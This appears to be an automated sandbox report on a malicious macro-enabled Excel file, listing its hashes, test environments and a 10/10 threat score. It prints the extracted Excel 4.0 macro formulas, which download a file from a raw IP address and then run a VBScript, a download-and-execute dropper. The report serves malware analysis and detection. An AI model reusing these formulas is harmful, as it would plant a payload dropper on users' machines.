General
-
Target
9f8e9c4d646573ca7b0c70af328d74d1
-
Size
6KB
-
Sample
240216-f7l81aaf3z
-
MD5
9f8e9c4d646573ca7b0c70af328d74d1
-
SHA1
f286348ee7182250be28e6d76fb02bb2ee4ae31e
-
SHA256
859a3fc3621ce1e8b4202876e1a829e2f819c25b9538f594d7488e22dbabaa3d
-
SHA512
5fb6f130f3b5bbe1ff1bc3a3a3e7ea74c191df6fec2f4a39aedb2247e0de86ecacbcb823a9bdff8ccad76d3344816a3730de96650947652a95d273a0789e91d3
-
SSDEEP
192:NDS9uSLbrA2OmmfRi8UhHFBFYusb98y3H+G:NausM2wk1FYpb98y3N
Static task
static1
Behavioral task
behavioral1
Sample
9f8e9c4d646573ca7b0c70af328d74d1.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
9f8e9c4d646573ca7b0c70af328d74d1.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
9f8e9c4d646573ca7b0c70af328d74d1
-
Size
6KB
-
MD5
9f8e9c4d646573ca7b0c70af328d74d1
-
SHA1
f286348ee7182250be28e6d76fb02bb2ee4ae31e
-
SHA256
859a3fc3621ce1e8b4202876e1a829e2f819c25b9538f594d7488e22dbabaa3d
-
SHA512
5fb6f130f3b5bbe1ff1bc3a3a3e7ea74c191df6fec2f4a39aedb2247e0de86ecacbcb823a9bdff8ccad76d3344816a3730de96650947652a95d273a0789e91d3
-
SSDEEP
192:NDS9uSLbrA2OmmfRi8UhHFBFYusb98y3H+G:NausM2wk1FYpb98y3N
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-